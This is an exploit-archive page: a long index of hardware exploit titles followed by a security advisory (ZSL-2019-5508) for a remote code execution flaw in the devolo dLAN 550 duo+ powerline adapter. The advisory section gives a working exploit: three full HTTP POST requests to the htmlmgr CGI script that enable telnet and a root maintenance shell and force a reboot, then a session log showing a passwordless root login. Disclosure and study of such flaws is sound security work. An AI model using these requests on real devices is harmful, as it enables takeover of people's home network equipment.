Menu

"devolo dLAN 550 duo+ Starter Kit - Remote Code Execution"

Author

sm

Platform

hardware

Release date

2019-02-05

Release Date Title Type Platform Author
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting" webapps hardware "Ronnie T Baby"
2019-02-11 "Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset" webapps hardware "Adithyan AK"
2019-02-05 "Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery" webapps hardware "Yusuf Furkan"
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Remote Code Execution" webapps hardware sm
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery" webapps hardware sm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting" webapps hardware "Bhushan B. Patil"
2019-01-28 "Cisco RV300 / RV320 - Information Disclosure" webapps hardware "Harom Ramos"
2019-01-28 "AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery" webapps hardware "Ali Can Gönüllü"
2019-01-25 "Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection" webapps hardware "RedTeam Pentesting"
2019-01-24 "Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery" webapps hardware "Ali Can Gönüllü"
2019-01-28 "Sricam gSOAP 2.8 - Denial of Service" dos hardware "Andrew Watson"
2019-01-16 "Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset" webapps hardware "Adithyan AK"
2019-01-16 "GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal" webapps hardware "Pasquale Turi"
2019-01-16 "FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure" webapps hardware "Julio Ureña"
2019-01-14 "Lenovo R2105 - Cross-Site Request Forgery (Command Execution)" webapps hardware "Nathu Nandwani"
2019-01-14 "Across DR-810 ROM-0 - Backup File Disclosure" webapps hardware SajjadBnd
2019-01-14 "Hootoo HT-05 - Remote Code Execution (Metasploit)" remote hardware "Andrei Manole"
2019-01-09 "ZTE MF65 BD_HDV6MF65V1.0.0B05 - Cross-Site Scripting" webapps hardware "Nathu Nandwani"
2019-01-09 "Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery (Update Admin)" webapps hardware SajjadBnd
2019-01-07 "Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)" webapps hardware "Nathu Nandwani"
2018-12-14 "Huawei Router HG532e - Command Execution" webapps hardware Rebellion
2018-12-14 "Cisco RV110W - Password Disclosure / Command Execution" remote hardware RySh
2018-12-11 "ZTE ZXHN H168N - Improper Access Restrictions" webapps hardware "Usman Saeed"
2018-12-11 "Huawei B315s-22 - Information Leak" webapps hardware "Usman Saeed"
2018-12-11 "TP-Link wireless router Archer C1200 - Cross-Site Scripting" webapps hardware "Usman Saeed"
2018-12-04 "NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage" webapps hardware hyp3rlinx
2018-12-04 "Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass" webapps hardware Luca.Chiou
2018-12-03 "Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting" webapps hardware Luca.Chiou
2018-11-30 "Schneider Electric PLC - Session Calculation Authentication Bypass" webapps hardware Photubias
2018-11-26 "Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal" webapps hardware "numan türle"
2018-11-26 "Ricoh myPrint 2.9.2.4 - Hard-Coded Credentials" webapps hardware Hodorsec
2018-11-27 "Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)" remote hardware Metasploit
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-12 "D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery" webapps hardware hyp3rlinx
2018-11-12 "TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)" webapps hardware Wadeek
2018-11-05 "Virgin Media Hub 3.0 Router - Denial of Service (PoC)" webapps hardware "Ross Inman"
2018-11-02 "Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel" local hardware "Billy Brumley"
2018-10-30 "NETGEAR WiFi Router R6120 - Credential Disclosure" webapps hardware Wadeek
2018-10-12 "D-Link Routers - Directory Traversal" webapps hardware "Blazej Adamczyk"
2018-10-12 "D-Link Routers - Plaintext Password" webapps hardware "Blazej Adamczyk"
2018-10-12 "D-Link Routers - Command Injection" webapps hardware "Blazej Adamczyk"
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-16 "Heatmiser Wifi Thermostat 1.7 - Credential Disclosure" webapps hardware d0wnp0ur
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2018-10-11 "Phoenix Contact WebVisit 6.40.00 - Password Disclosure" webapps hardware Photubias
2018-10-11 "WAGO 750-881 01.09.18 - Cross-Site Scripting" webapps hardware SecuNinja
2018-10-08 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure" webapps hardware LiquidWorm
2018-10-06 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-05 "Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Request Forgery (Add Admin)" webapps hardware cakes
2018-10-03 "RICOH MP C1803 JPN Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-10-03 "Airties AIR5342 1.0.0.18 - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-10-01 "Billion ADSL Router 400G 20151105641 - Cross-Site Scripting" webapps hardware cakes
2018-09-25 "RICOH MP C406Z Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-25 "RICOH MP 305+ Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-25 "RICOH MP C6503 Plus Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-25 "RICOH MP C2003 Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-24 "RICOH MP C6003 Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-24 "RICOH Aficio MP 301 Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-24 "LG SuperSign EZ CMS 2.5 - Remote Code Execution" webapps hardware "Alejandro Fanjul"
2018-09-21 "Collectric CMU 1.0 - 'lang' Hard-Coded Credentials / SQL injection" webapps hardware "Simon Brannstrom"
2018-09-19 "LG SuperSign EZ CMS 2.5 - Local File Inclusion" webapps hardware "Alejandro Fanjul"
2018-09-17 "Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting" webapps hardware cakes
2018-09-12 "LG Smart IP Camera 1508190 - Backup File Download" webapps hardware "Ege Balci"
2018-09-12 "CirCarLife SCADA 4.3.0 - Credential Disclosure" webapps hardware SadFud
2018-09-10 "LW-N605R 12.20.2.1486 - Remote Code Execution" webapps hardware "Nassim Asrir"
2018-09-07 "QNAP Photo Station 5.7.0 - Cross-Site Scripting" webapps hardware "Mitsuaki Shiraishi"
2018-09-06 "D-Link Dir-600M N150 - Cross-Site Scripting" webapps hardware "PUNIT DARJI"
2018-08-31 "Vox TG790 ADSL Router - Cross-Site Scripting" webapps hardware cakes
2018-08-30 "DLink DIR-601 - Credential Disclosure" webapps hardware "Kevin Randall"
2018-08-29 "Episerver 7 patch 4 - XML External Entity Injection" webapps hardware "Jonas Lejon"
2018-08-27 "Seagate Personal Cloud SRN21C 4.3.16.0 / 4.3.18.0 - SQL Injection" webapps hardware "Yorick Koster"
2018-08-27 "RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)" webapps hardware "Ismail Tasdelen"
2018-08-24 "Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)" webapps hardware cakes
2018-08-22 "Geutebrueck re_porter 16 - Cross-Site Scripting" webapps hardware "Kamil Suska"
2018-08-22 "ZyXEL VMG3312-B10B - Cross-Site Scripting" webapps hardware "Samet ŞAHİN"
2018-08-21 "Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)" webapps hardware Alfie
2018-08-17 "ADM 3.1.2RHG1 - Remote Code Execution" webapps hardware "Matthew Fulton"
2018-08-15 "ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass" webapps hardware AmnBAN
2018-08-09 "TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)" webapps hardware Wadeek
2018-08-09 "TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)" webapps hardware Wadeek
2018-08-22 "Geutebrueck re_porter 7.8.974.20 - Credential Disclosure" webapps hardware "Kamil Suska"
2018-08-02 "ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution" webapps hardware "Fakhri Zulkifli"
2018-07-31 "LG NAS 3718.510.a0 - Remote Command Execution" webapps hardware 0x616163
2018-09-06 "WirelessHART Fieldgate SWG70 3.0 - Directory Traversal" webapps hardware "Hamit CİBO"
2018-07-26 "Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)" webapps hardware vulnc0d3
2018-07-24 "D-link DAP-1360 - Path Traversal / Cross-Site Scripting" webapps hardware r3m0t3nu11
2018-08-17 "Mikrotik WinBox 6.42 - Credential Disclosure (golang)" webapps hardware "Maxim Yefimenko"
2018-07-23 "Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)" webapps hardware "Nathu Nandwani"
2018-07-23 "Davolink DVW 3200 Router - Password Disclosure" webapps hardware "Ankit Anubhav"
2018-07-23 "NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution" webapps hardware "Berk Dusunur"
2018-07-20 "Touchpad / Trivum WebTouch Setup 2.53 build 13163 - Authentication Bypass" webapps hardware vulnc0d3
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-07-13 "Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery" webapps hardware t4rkd3vilz
2018-07-13 "Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload" webapps hardware "Safak Aslan"
2018-07-13 "QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities" webapps hardware "Core Security"
2018-07-16 "VelotiSmart WiFi B-380 Camera - Directory Traversal" webapps hardware "Miguel Mendez Z"
2018-07-22 "GeoVision GV-SNVR0811 - Directory Traversal" webapps hardware "Berk Dusunur"
2018-07-10 "D-Link DIR601 2.02 - Credential Disclosure" webapps hardware "Thomas Zuk"
2018-07-02 "VMware NSX SD-WAN Edge < 3.1.2 - Command Injection" webapps hardware ParagonSec
2018-07-02 "Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)" webapps hardware RandoriSec
2018-06-28 "Cisco Adaptive Security Appliance - Path Traversal" webapps hardware "Yassine Aboukir"
2018-06-28 "DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting" webapps hardware "Adipta Basu"
2018-06-25 "Intex Router N-150 - Arbitrary File Upload" webapps hardware "Samrat Das"
2018-06-25 "Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)" webapps hardware Wadeek
2018-06-25 "Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "DIGISOL DG-BR4000NG - Cross-Site Scripting" webapps hardware "Adipta Basu"
2018-06-25 "Intex Router N-150 - Cross-Site Request Forgery (Add Admin)" webapps hardware "Samrat Das"
2018-07-05 "ADB Broadband Gateways / Routers - Authorization Bypass" webapps hardware "SEC Consult"
2018-06-20 "TP-Link TL-WA850RE - Remote Command Execution" webapps hardware yoresongo
2018-06-11 "Siaberry 1.2.2 - Command Injection" webapps hardware "Space Duck"
2018-06-08 "XiongMai uc-httpd 1.0.0 - Buffer Overflow" webapps hardware "Andrew Watson"
2018-06-04 "Brother HL Series Printers 1.15 - Cross-Site Scripting" webapps hardware "Huy Kha"
2018-05-31 "TAC Xenta 511/911 - Directory Traversal" webapps hardware "Marek Cybul"
2018-05-29 "NUUO NVRmini2 / NVRsolo - Arbitrary File Upload" webapps hardware M3@Pandas
2018-05-28 "TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass" webapps hardware "BlackFog Team"
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-09-05 "Tenda ADSL Router D152 - Cross-Site Scripting" webapps hardware "Sandip Dey"
2018-05-23 "SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change" webapps hardware "Safak Aslan"
2018-05-22 "Nordex N149/4.0-4.5 - SQL Injection" webapps hardware t4rkd3vilz
2018-05-21 "Teradek Slice 7.3.15 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek Cube 7.3.6 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-20 "D-Link DSL-3782 - Authentication Bypass" webapps hardware "Giulio Comi"
2018-05-18 "Cisco SA520W Security Appliance - Path Traversal" webapps hardware "Nassim Asrir"
2018-05-17 "Intelbras NCLOUD 300 1.0 - Authentication bypass" webapps hardware "Pedro Aguiar"
2018-05-10 "Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery" webapps hardware "Raffaele Sabato"
2018-03-27 "DLINK DCS-5020L - Remote Code Execution (PoC)" webapps hardware "Fidus InfoSecurity"
2018-04-26 "TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Remote Reboot" webapps hardware Wadeek
2018-04-18 "Lutron Quantum 2.0 - 3.2.243 - Information Disclosure" webapps hardware SadFud
2018-04-06 "FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass" webapps hardware "Noman Riffat"
2018-04-02 "Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change" webapps hardware "Todor Donev"
2018-04-02 "DLink DIR-601 - Admin Password Disclosure" webapps hardware "Kevin Randall"
2018-04-02 "VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials" webapps hardware LiquidWorm
2018-03-28 "Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change" webapps hardware "Todor Donev"
2018-03-23 "TL-WR720N 150Mbps Wireless N Router - Cross-Site Request Forgery" webapps hardware "Mans van Someren"
2018-03-20 "Coship RT3052 Wireless Router - Persistent Cross-Site Scripting" webapps hardware "Sayan Chatterjee"
2018-03-20 "Intelbras Telefone IP TIP200 LITE - Local File Disclosure" webapps hardware anhax0r
2018-03-16 "Contec Smart Home 4.15 - Unauthorized Password Reset" webapps hardware Z3ro0ne
2018-03-02 "D-Link DIR-600M Wireless - Cross-Site Scripting" webapps hardware "Prasenjit Kanti Paul"
2017-11-27 "ZTE ZXDSL 831CII - Improper Access Restrictions" webapps hardware "Ibad Shah"
2017-11-17 "Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting" webapps hardware "Keith Thome"
2017-10-17 "TP-Link WR940N - (Authenticated) Remote Code" webapps hardware "Fidus InfoSecurity"
2017-10-12 "TP-Link TL-MR3220 - Cross-Site Scripting" webapps hardware "Thiago Sena"
2017-10-12 "Dreambox Plugin BouquetEditor - Cross-Site Scripting" webapps hardware "Thiago Sena"
2017-09-27 "NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution" webapps hardware "Kacper Szurek"
2017-10-03 "Fiberhome AN5506-04-F - Command Injection" webapps hardware Tauco
2017-10-02 "NPM-V (Network Power Manager) 2.4.1 - Password Reset" webapps hardware "Saeed reza Zamanian"
2017-09-24 "HBGK DVR 3.0.0 build20161206 - Authentication Bypass" webapps hardware "RAT - ThiefKing"
2017-09-28 "Roteador Wireless Intelbras WRN150 - Autentication Bypass" webapps hardware "Elber Tavares"
2017-09-25 "FLIR Thermal Camera F/FC/PT/D - Stream Disclosure" webapps hardware LiquidWorm
2017-09-25 "FLIR Thermal Camera FC-S/PT - Command Injection" webapps hardware LiquidWorm
2017-09-25 "FLIR Thermal Camera F/FC/PT/D - Information Disclosure" webapps hardware LiquidWorm
2017-09-25 "FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution" webapps hardware LiquidWorm
2017-09-18 "iBall ADSL2+ Home Router - Authentication Bypass" webapps hardware "Gem George"
2017-09-15 "UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass" webapps hardware "Gem George"
2017-09-14 "Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass" webapps hardware Kivson
2017-09-12 "D-Link DIR-8xx Routers - Local Firmware Upload" webapps hardware embedi
2017-09-12 "D-Link DIR-8xx Routers - Root Remote Code Execution" webapps hardware embedi
2017-09-12 "D-Link DIR-8xx Routers - Leak Credentials" webapps hardware embedi
2017-09-11 "WiseGiga NAS - Multiple Vulnerabilities" webapps hardware "Pierre Kim"
2017-09-05 "FiberHome ADSL AN1020-25 - Improper Access Restrictions" webapps hardware "Ibad Shah"
2017-09-07 "Huawei HG255s - Directory Traversal" webapps hardware "Ahmet Mersin"
2017-09-07 "Roteador Wireless Intelbras WRN150 - Cross-Site Scripting" webapps hardware "Elber Tavares"
2017-09-04 "Wireless Repeater BE126 - Remote Code Execution" webapps hardware "Hay Mizrachi"
2017-08-29 "Brickcom IP Camera - Credentials Disclosure" webapps hardware "Emiliano Ipar"
2017-08-29 "D-Link DIR-600 - Authentication Bypass" webapps hardware "Jithin D Kurup"
2017-08-12 "AirMaster 3000M - Multiple Vulnerabilities" webapps hardware "Mr.8Th BiT"
2017-08-12 "RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)" webapps hardware "Touhid M.Shaikh"
2017-08-08 "Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution" webapps hardware "Kacper Szurek"
2017-08-03 "Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting" webapps hardware "Geolado giolado"
2017-08-01 "SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection" webapps hardware "Andy Tan"
2017-07-28 "FortiOS < 5.6.0 - Cross-Site Scripting" webapps hardware patryk_bogdan
2017-07-20 "VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass" webapps hardware Viktoras
2017-07-18 "Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)" webapps hardware xort
2017-07-14 "WDTV Live SMP 2.03.20 - Remote Password Reset" webapps hardware Sw1tCh
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download" webapps hardware LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation" webapps hardware LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery" webapps hardware LiquidWorm
2017-07-13 "Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass" webapps hardware LiquidWorm
2017-07-11 "DataTaker DT80 dEX 1.50.012 - Information Disclosure" webapps hardware "Nassim Asrir"
2017-07-10 "Pelco Sarix/Spectra Cameras - Remote Code Execution" webapps hardware LiquidWorm
2017-07-10 "Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)" webapps hardware LiquidWorm
2017-07-10 "Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting" webapps hardware LiquidWorm
2017-07-03 "OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution" webapps hardware "Jonatas Fil"
2017-06-30 "Humax HG100R 2.0.6 - Backup File Download" webapps hardware gambler
Release Date Title Type Platform Author
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Remote Code Execution" webapps hardware sm
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery" webapps hardware sm
2016-11-30 "Xitami Web Server 5.0a0 - Denial of Service" dos windows sm

Unfortunately we've not tracked down any possible victims.

Ads

devolo dLAN 550 duo+ Starter Kit Remote Code Execution


Vendor: devolo AG
Product web page: https://www.devolo.com
Affected version: dLAN 500 AV Wireless+ 3.1.0-1 (i386)

Summary: Devolo dLAN® 550 duo+ Starter Kit is Powerlineadapter which is
a cost-effective and helpful networking alternative for any location
without structured network wiring. Especially in buildings or residences
lacking network cables or where updating the wiring would be expensive
and complicated, Powerline adapters provide networking at high transmission
rates.

Desc: The devolo firmware has what seems to be a 'hidden' services which
can be enabled by authenticated attacker via the the htmlmgr CGI script.
This allows the attacker to start services that are deprecated or discontinued
and achieve remote arbitrary code execution with root privileges.

Tested on: Linux 2.6.31


Vulnerability discovered by Stefan Petrushevski aka sm
                            @zeroscience


Advisory ID: ZSL-2019-5508
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5508.php


04.10.2017

--

The htmlmgr cgi script that is accessible via web, does not validate or sanitize
the configuration parameters that a user wants to change. This allows an attacker
to change configuration parametersincluding parameters that are not even shown in
the web administration panel.

One service that is possible for an attacker to enable is telnet and remote maintenance
shell service and then proceed to login in with the 'root' user which doesn't have a password.

In order for an attacker to achieve this, he would need to change the following two values:
System.Baptization.Telnetd  <- to enable telnet
System.Baptization.shell  	<- to enable remote maintenance shell

--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP

%3Asys%3ASystem.Baptization.Telnetd=1&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------

--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP

%3Asys%3ASystem.Baptization.shell=1&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------

Since the configuration is read from a file on boot time, an attacker would also
need to somehow make the device to restart. This can be done by issuing the 'reboot'
command again from the html cgi script: System.Reboot

--------
POST /cgi-bin/htmlmgr HTTP/1.1
Host: DEVOLO-IP

%3Asys%3ASystem.Reboot=OLACANYOUREBOOT&_okdir=spec&_okpage=result&_okfollowdir=status&_okfollowpage=wireless&_okplain=1&_oktype=wlanstatus&_file=%2Fwgl%2Fmain.wgl&_style=std&_lang=&_dir=wireless&_page=wps&_idx=&_sid=&_csrf=
--------

After the reboot the devolo device will have a telnet service on TCP port 23 opened
and an attacker can now login to the device with user 'root' and no password.

--------
Trying DEVOLO-IP...
Connected to DEVOLO-IP.
Escape character is '^]'.

dlanwireless login: root
# whoami
root
# 
--------

The attacker then has complete access over the device. t00t.